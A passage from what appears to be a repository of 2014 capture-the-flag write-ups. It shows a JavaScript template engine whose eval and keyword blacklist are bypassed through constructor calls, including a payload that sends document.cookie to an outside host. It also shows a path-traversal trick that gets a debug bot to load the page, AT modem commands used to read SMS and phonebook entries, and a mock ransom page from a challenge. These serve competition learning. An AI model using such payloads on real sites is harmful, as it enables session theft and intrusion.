String.prototype.header = function(){ 152 | return "[header]"+this.toString()+"[/header]" 153 | } 154 | this.content = content; 155 | this.params = params || {}; 156 | this.anti_xss = function(input){ 157 | return input.toString() 158 | .replace(/&/g,'&') 159 | .replace(//g,'>') 161 | .replace(/'/g,''') 162 | .replace(/"/g,'"') 163 | } 164 | this.filter_blacklist = function(input){ 165 | var blacklist = /this|document|window|object|function|top|parent|eval|script|alert|prompt/gi 166 | // hm... 167 | return input.replace(blacklist,"..") 168 | } 169 | this.render = function(params){ 170 | this.params = params || this.params; 171 | while(x = /<%=([\w\.\(\)]+)%>/g.exec(this.content)){ 172 | eval("var p = this.params."+this.filter_blacklist(x[1])); 173 | this.content = this.content.replace(x[0],p); 174 | } 175 | return this.anti_xss(this.content) 176 | .replace(/\n/g,"
") 177 | .replace('[header]','

') 178 | .replace('[/header]','

'); // newline to br 179 | }; 180 | } 181 | ``` 182 | 183 | ...? 184 | Yes!! 185 | there is nothing to talk about it further. we see that the code has eval() function. 186 | However, it has all these blacklisted stuff, and all I know now is that the injection has to be done with asp-like tags. 187 | 188 | By searching some functions for while, I found out that the constructor method can be called which will eventually load the function. 189 | 190 | If we input this and check the console log for testing: 191 | 192 | ``` 193 | HTML: <%=title.header.constructor(console.log(1))()%> 194 | PARAM: (default) 195 | => http://challenges.wargame.vn:50004/template/a1e1ce29099ba4dbe3b4f168bae6bd62 196 | ``` 197 | 198 | I get the value "1" from console log. This assures that there is a vulnerability for XSS. 199 | As we go further, I realize that the filters can be bypassed after the ASP-like tags. 200 | 201 | so if I use some string functions like `substr` or `indexOf`, we can call javascript stuff within the constructor. 202 | 203 | so if we input this for xss stuff: 204 | ``` 205 | HTML: <%=lol.header.constructor(html.value.substr(52))()%>document.location.href='http://stypr.com/xss.pl?xss='+document.cookie; 206 | PARAM: {"lol":"penthackon"} 207 | => http://challenges.wargame.vn:50004/template/5656b0f5e5f86f9b23c1c2d7c517370e 208 | ``` 209 | 210 | it comes 404 page but it has been redirected to my website with the cookies on it. 211 | 212 | 213 | Now, it's the feedback one. 214 | they ask the Debug URL for any problem, but if we put 215 | ``` 216 | http://challenges.wargame.vn:50004/debug/5656b0f5e5f86f9b23c1c2d7c517370e 217 | ``` 218 | 219 | this won't work from server-side because this will only output as text file. 220 | 221 | so, if we bypass using LFI methods we can successfully send the template page with the xss on it: 222 | ``` 223 | http://challenges.wargame.vn:50004/debug/areyouserious/../../template/5656b0f5e5f86f9b23c1c2d7c517370e 224 | ``` 225 | 226 | ![success](xyz_template_success.png) 227 | 228 | -------------------------------------------------------------------------------- /2014/0x3004_2014/web/xyz_bank_success.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/web/xyz_bank_success.png -------------------------------------------------------------------------------- /2014/0x3004_2014/web/xyz_template_success.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/web/xyz_template_success.png -------------------------------------------------------------------------------- /2014/0x3004_2014/web/xyz_template_trace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/0x3004_2014/web/xyz_template_trace.png -------------------------------------------------------------------------------- /2014/PHDays_2014/README.md: -------------------------------------------------------------------------------- 1 | ![scoreboard](scoreboard.png) 2 | 3 | Participated as `Friend of Dalvik` (a part of wowhacker team) 4 | 5 | 6 | ## Snowden Gadget 7 | 8 | By bruteforcing characters to the server, you will find out that the that there is "AT" command on the shell. 9 | 10 | Not only that, the hint on the given challenge was written as "Hayes". 11 | 12 | By googling the hint, you find out that the challenge is related to the Huawei modem. 13 | 14 | ``` 15 | 4.15 Message list command +CMGL 16 | 4.15.1 Command Syntax 17 | Command Possible response(s) 18 | +CMGL[=] 19 | In case of pdu mode and successful execution of command: 20 | [+CMGL: 21 | ,,[], 22 | [+CMGL:,,[], 24 | [...]]]OK 25 | Otherwise: 26 | +CMS ERROR: 27 | +CMGL=? +CMGL: (list of supported s) 28 | OK 36 | [,] 37 | [^CPBR: 38 | ,,,,[,][[...] 39 | ^CPBR: 40 | ,,,],[,]] 41 | ]OK 42 | In case of MS-related error: 43 | +CME ERROR: 44 | ^CPBR=? 45 | ^CPBR: (list of supported 46 | s),[],[],[] 47 | OK 48 | In case of MS-related error: 49 | +CME ERROR: 50 | 8.5.2 Description 51 | This command returns the phonebook entries between positions index1 and index2 in 52 | the currently selected phonebook memory. If no entry exists between index1 and 53 | index2, the following will be returned: 54 | +CME ERROR: not found 55 | Alternatively, you can input index1 only, and only the phonebook entries in the position 56 | index1 will be returned. 57 | The TEST command returns the position range of the currently selected p 58 | ```` 59 | 60 | you will eventually get the flag by using the +CMGL and ^CPBR command. -------------------------------------------------------------------------------- /2014/PHDays_2014/backup/Minecraft_really_stereotyped!!.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stypr/ctf/103a989482d5434f61202037ec398ea7d350d1c2/2014/PHDays_2014/backup/Minecraft_really_stereotyped!!.png -------------------------------------------------------------------------------- /2014/PHDays_2014/backup/PHP_JL.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 |
9 |
10 |

You data was encrypted and stored in Detcelfer Data Prison

11 |

This is a prison for stolen data from victim's computers. Pay us 31,337 BTC to get back your data or we will delete it. You have only two days for it, so don't waste your time

12 |

Pay now »

13 |
14 |
15 | 16 |
17 |
18 |
19 |

Seriously

20 |

Don't try to cheat us. Don't forget who has the better case now!

21 |

Pay us »

22 |
23 |
24 |

Unbreakable

25 |

Our prison is the best prison in the world. There is no byte leaked from our prison

26 |

Pay us »

27 |
28 |
29 |

Our data center works for you

30 |

We build, maintain and operate our own data centers, and have a deep understanding of your infrastructure from the ground up. That means less finger pointing, more accountability and more reliability.

31 |

Pay us »

32 |
33 |
34 | 35 |
36 | 37 |
38 |

© Detcelfer PHDays 2013-2014

39 |
40 |
41 | 42 | 43 |